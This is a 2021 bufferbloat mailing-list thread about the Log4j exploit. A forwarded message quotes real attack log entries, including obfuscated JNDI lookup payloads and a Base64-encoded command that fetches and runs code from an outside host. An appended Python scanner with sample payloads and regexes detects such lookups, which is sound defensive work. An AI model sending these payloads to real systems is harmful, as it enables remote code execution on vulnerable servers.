Just a note that this doesn't require the code to be written in Java; any language that runs in a JVM can end up having grief.

David Lang

On Mon, 13 Dec 2021, Dave Taht wrote:

Date: Mon, 13 Dec 2021 05:56:36 -0800
From: Dave Taht <[email protected]>
To: bloat <[email protected]>
Subject: [Bloat] Fwd: Log4j mitigation

For those of you losing sleep over the Java logging exploit, my heart
goes out to you.

While I'm glad that I, personally, and the bufferbloat-related websites
haven't got a single thing written in Java, and I lost 3 weeks of my
life over Christmas to Spectre, and several weeks per year (and
usually right around Christmas!) coping with other CVEs... this one
seems so big and affects so many other services I use that I just
kind of want to take all my cash out of the bank, log out, and
find a tropical island somewhere.

---------- Forwarded message ---------
From: Jörg Kost <[email protected]>
Date: Mon, Dec 13, 2021 at 3:43 AM
Subject: Re: Log4j mitigation
To: Jean St-Laurent <[email protected]>
Cc: <[email protected]>


You can't see it. The attack vector can hide in HTTP GETs, POSTs (SSL),
headers, anything related to where a Java process does logging
with Log4j; it's innumerable. It might even evaluate from a URI itself;
it won't use a fixed port. It's not wormy right now, but maybe it will
be soon.

We have been seeing things like this since the 10th of Dec. And this is only a
typical Apache log file for HTTP/HTTPS, where we do logging:

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo}
GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281
"${jndi:dns://45.83.64.1/securityscan-http80}"
"${jndi:dns://45.83.64.1/securityscan-http80}
GET
/?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a}
HTTP/1.1" 200 -
"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}"
"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}
--
I tried to build a better future, a few times:
https://wayforward.archive.org/?site=https%3A%2F%2Fwww.icei.org

Dave Täht CEO, TekLibre, LLC
_______________________________________________
Bloat mailing list
[email protected]
https://lists.bufferbloat.net/listinfo/bloat
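The obfuscated lookups in the log lines quoted above (${lower:x} case lookups, the ${::-x} default-value syntax, URL-encoded braces, nesting inside ${jndi:...}) all collapse to the same ${jndi:<scheme>://<target>...} string once the lookups are evaluated the way Log4j would evaluate them. The following Python is an added example, not code from this thread or from any of its participants: it normalizes those layers and then flags JNDI lookups wherever they occur in a log line (request line, referer, user agent), since, as the message says, the payload can sit in any logged field. The sample log lines are constructed for the example with documentation IP ranges and example.net hostnames rather than the addresses in the thread, and the lookup syntax it resolves is limited to the variants seen above.

```python
from __future__ import annotations

import re
from urllib.parse import unquote

# Obfuscation layers seen in the quoted log lines: ${lower:x} / ${upper:x}
# case lookups, ${name:-default} default-value syntax (so ${::-j} evaluates
# to "j"), nesting of one lookup inside another, and URL-encoded "${" / "}".
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# A lookup with no ":" and no default (e.g. ${hostName}) can only be resolved
# on the logging host itself; keep it as a visible <placeholder> so the
# surrounding URI stays readable in the finding.
_PLAIN = re.compile(r"\$\{([A-Za-z0-9_.\-]+)\}")
# Whole JNDI lookup: scheme (ldap, ldaps, rmi, dns, ...) and host[:port].
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.\-]*)://([^/}\s]+)[^}]*\}?",
    re.IGNORECASE,
)

# Constructed sample lines in Apache combined-log style (not from the thread).
SAMPLE_LOG_LINES = [
    # ${jndi:...} in the request path, URL-encoded by the client
    'GET /$%7Bjndi:dns://198.51.100.8/securityscan-http80%7D HTTP/1.1" 301 281 "-" "-"',
    # ${lower:} lookups spelling out "ldap", placed in the User-Agent field;
    # "QUJD" is just base64 for "ABC"
    'GET / HTTP/1.1" 200 - "-" "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://198.51.100.7:12344/Basic/Command/Base64/QUJD}"',
    # ${::-x} default-value syntax spelling out "jndi" and "ldap", with a
    # victim-side ${hostName} lookup used to tag the callback
    'GET /?x=${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.cb-id.example.net/a} HTTP/1.1" 200 -',
    # benign requests, one of which merely contains a brace expression
    'GET /api/${version}/status HTTP/1.1" 200 17 "-" "curl/7.81.0"',
    'GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]


def normalize_lookups(text: str, max_rounds: int = 32) -> str:
    """Undo URL-encoding, then collapse nested Log4j lookups from the inside out."""
    # Repeated decoding also handles double-encoded "%2524%257B" payloads.
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    # Each round resolves the innermost lookups; stop at a fixed point.
    for _ in range(max_rounds):
        previous = text
        text = _LOWER.sub(lambda m: m.group(1).lower(), text)
        text = _UPPER.sub(lambda m: m.group(1).upper(), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
        text = _PLAIN.sub(lambda m: "<" + m.group(1) + ">", text)
        if text == previous:
            break
    return text


def find_jndi_lookups(line: str) -> list[dict]:
    """Return one finding per JNDI lookup present anywhere in a log line."""
    normalized = normalize_lookups(line)
    return [
        {
            "scheme": m.group(1).lower(),
            "target": m.group(2),
            "lookup": m.group(0),
        }
        for m in _JNDI.finditer(normalized)
    ]


def scan_log(lines) -> list[dict]:
    """Scan an iterable of log lines; findings carry the 1-based line number."""
    results = []
    for number, line in enumerate(lines, start=1):
        for hit in find_jndi_lookups(line):
            results.append({"line": number, **hit})
    return results


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG_LINES):
        print(f"line {finding['line']}: {finding['scheme']} -> {finding['target']}  {finding['lookup']}")
```

A hit in the access log only shows that a probe was logged; whether the lookup actually resolved depends on the Log4j version on the logging host and on its outbound connectivity, so the log findings are for scoping and triage, not a substitute for patching.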